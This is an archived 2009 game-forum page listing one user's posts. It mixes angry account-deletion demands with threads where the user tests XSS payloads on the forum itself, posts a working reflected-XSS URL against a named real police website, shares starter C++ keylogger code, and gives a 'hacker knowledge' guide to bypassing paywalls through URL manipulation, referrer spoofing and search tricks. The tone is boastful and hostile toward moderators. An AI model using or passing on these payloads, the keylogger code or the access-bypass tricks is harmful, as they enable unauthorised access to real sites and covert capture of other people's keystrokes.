You are currently looking at Flamebate, our community forums. Players can discuss the game here, strategize, and role play as their characters.
You need to be logged in to post and to see the uncensored versions of these forums.
STGill's Flamebate Posts
View STGill's ProfileSearch Results | ||
---|---|---|
DELETE MY ACCOUNT.If it is possible please remove this account from your database. I would rather it have never existed.
No matter which forum you are in Trolls seem to be allowed outside there clbum and genre, fine by me. I just want nothing to do with it anymore.
No matter what I do, I get attacked over utter nonsense, even the mods have found it necessary to attack me.
So get on in your Database, run a wild card of STGill and be sure to hit Delete.
-I’m out, **** you all. Even the mods.
By the way: I have discovered it is possible to run man in the middle attacks by spoofing or decrypting SSL certificate (SSL 2.0), look and you will see I am correct.
Easily fixed by upgrading to 3.0
MCB —> Move it to CD (view post) |
08/05/2009 | |
STGill: I am going to **** up this site.MC Banhammer Posted:
No I didn’t. I know exactly what I said and it was never in thing to that effect. (view post) |
08/05/2009 | |
STGill: I am going to **** up this site.I never stated I was going to **** up this site. (view post) |
08/05/2009 | |
XSS TestingFie Posted:
I am not involved with any Klan, nor will I ever be. (view post) |
08/05/2009 | |
XSS TestingTUBSWEETIE Posted:
I apologize, I misunderstood a statement sent to me over IM. (view post) |
08/05/2009 | |
XSS TestingMC Banhammer Posted:
If the XSS works it would not be visible anyway, perhaps in the source but not otherwise. (view post) |
08/05/2009 | |
XSS TestingFine, I hear the mods are whining on skype. Close this thread if your going to cry about you weiners. And should I find one in my later probings, I’ll be sure to release it to every site except this one. (view post) |
08/05/2009 | |
XSS TestingI am under the impression it is NOT against the rules to attempt to discover XSS or other vulnerability, in fact you can earn an e-peen for it.
I just set up a workspace is all. (view post) |
08/05/2009 | |
XSS TestingWhat seems to be the problems fellas? (view post) |
08/05/2009 | |
XSS TestingNote: I created this thread to test XSS vulnerabilities.
<head>TEST</head> ”<” . “head” . ”>” . “TEST” . ”</” . “head” . ”>”;
Unicode: <a href="http://www.google.com">HERE</a>
’;alert(String.fromCharCode(88,83,83))//\’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//—></SCRIPT>”>‘><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
’’;!—”<XSS>=&{()}
[img=”jav ascript:alert(‘XSS’Log in to see images!;”>]
\”;alert(‘XSS’Log in to see images!;//
[color=”&{alert(‘XSS’Log in to see images!}”][/color] [color=&{alert(‘XSS’Log in to see images!}][/color] [font=”&{alert(‘XSS’Log in to see images! (view post) |
08/05/2009 | |
Basic C++ Keylogger!1337xxxxxxxxxlolololololololololxxxxxxxxx1337 Posted:
LOL. What part is made up? (view post) |
08/05/2009 | |
Basic C++ Keylogger!ChilePepino Posted:
LOL, awesome. Nethack FTW (view post) |
08/05/2009 | |
Basic C++ Keylogger!LostKhaos Posted:
Well, you wouldn’t use windows.h to be sure but the hex code for key strokes should be universal.
The same principle can be applied in linux using different libraries (can’t remember them offhand) as the root user add it to /etc/inittab or /etc/init.d
The preceding code was written in “Dev C++” for Win32, and is actually the base code for a Text Adventure Engine I am working on. (The TAE has much more code.)
Another way to do it in linux is to use evbug [4298922.635000] evbug.c: Event. Dev: isa0060/serio0/input0, Type: 1, Code: 103, Value: 0 [4298922.635000] evbug.c: Event. Dev: isa0060/serio0/input0, Type: 0, Code: 0, Value: 0 [4298923.302000] evbug.c: Event. Dev: isa0060/serio0/input0, Type: 4, Code: 4, Value: 200 [4298923.302000] evbug.c: Event. Dev: isa0060/serio0/input0, Type: 1, Code: 103, Value: 1 [4298923.302000] evbug.c: Event. Dev: isa0060/serio0/input0, Type: 0, Code: 0, Value: 0 [4298923.380000] evbug.c: Event. Dev: isa0060/serio0/input0, Type: 4, Code: 4, Value: 200 [4298923.380000] evbug.c: Event. Dev: isa0060/serio0/input0, Type: 1, Code: 103, Value: 0 [4298923.380000] evbug.c: Event. Dev: isa0060/serio0/input0, Type: 0, Code: 0, Value: 0 (view post) |
08/05/2009 | |
LAPD Online XSSHehe, who says I haven’t been looking? (view post) |
08/05/2009 | |
LAPD Online XSSquangntenemy Posted:
Oh, well that saves me time then doesn’t it lol. (view post) |
08/05/2009 | |
LAPD Online XSSI’ll be sure to do that, but this is the hacker Roleplay forum so I am having some fun. Log in to see images! (view post) |
08/05/2009 | |
LAPD Online XSSI actually sent them an e-mail about this over a year ago and it STILL has not been fixed.
http://www.lapdonline.org/search_results/search/&view_all=1&chg_filter=1&searchType=content_basic&search_terms=%3Cscript%3Ewindow.open%28%22http://www.google.com%22%29%3C/script%3E(view post) |
08/05/2009 | |
Basic Hacker KnowledgeI have been asked often times how I get free porn, I have a serious issue with paying for porn, it is like paying for sex and I just won’t do it. Hacking any website requires starts with a quick glance.
Does it use some sort of server side scripting language like PHP, CGI or Perl? If so what variables are pbumed through the URL. Can they be directly manipulated?
One such example is a certain adult dating website, and rather than post the url here I will just fling some asterisk’s to hide the name.
If you go to this site and right click a profile image, you will see this when you view properties properties. http://cachecdn.*****.com/user-images/16313/16313785-S-1.jpg
So, why don’t we just directly manipulate that URL and change that S (which probably means SMALL to L which probably means LARGE)
http://cachecdn.*****.com/user-images/16313/16313785-L-1.jpg
Well, well…big picture. Now according to the site, she has seven pictures so changed the “L-1” to “L-2” and you’ll see the third picture, since it seems the numbering actually starts at 0.
Okay, so there is an example of URL manipulation.
The next trick is a really old trick, but STILL handy sadly enough.
Some sites check the REFERRING page before they allow you access to the requested URL. We can easily beat this by changing the packet header REFERRER data.
The most common method is REF=URL aka http://site.com/members = Http://site.com/members
Third trick:
Simple but often ignored, goto a protected URL using basic auth and when the login frame pops up, just click okay. This works more than you know!
Using google.
Google is your friend, it has crawled so much of the web it will rveal to you most anything you ask for, sometimes even protected or hidden content.
Take SPankWire.com for example, you have to have a platinum account to download video…or do you?
Search the source of the video page for the FLV, copy the name of the FLV and run a search in google for say
111641_vicky_vette_anal_1
Bang. Open directory, handy eh?
Okay, thats all for today kiddies, need my porn.
(view post) |
08/05/2009 | |
Basic C++ Keylogger!Below is an easy to use C++ function which can easily be converted into a keylogger! #include <iostream> #include <string> #include <fstream> #include <conio.h> #include "windows.h" using namespace std; int main(){ One: string keystrokes; cout << "KeyStrokes: " << keystrokes << "\n"; getch(); // just using getch to make C++ wait for key strokes. if (GetAsyncKeyState(VK_SPACE) != 0) { keystrokes+="SPACE" goto One; } // Below is for letters where is says Hex Code put the hex equivilant // like 0x45 if (GetAsyncKeyState(0x45) != 0) { keystrokes+="A" goto One; } /* But there you go my hacker friends basic ground work for a primitive keylogger. You could do like I did with mine and set up the keys in an array which will make the code much smaller. Play with it, have fun! */(view post) |
08/05/2009 | |
TRUTHXylon Posted: |
08/04/2009 |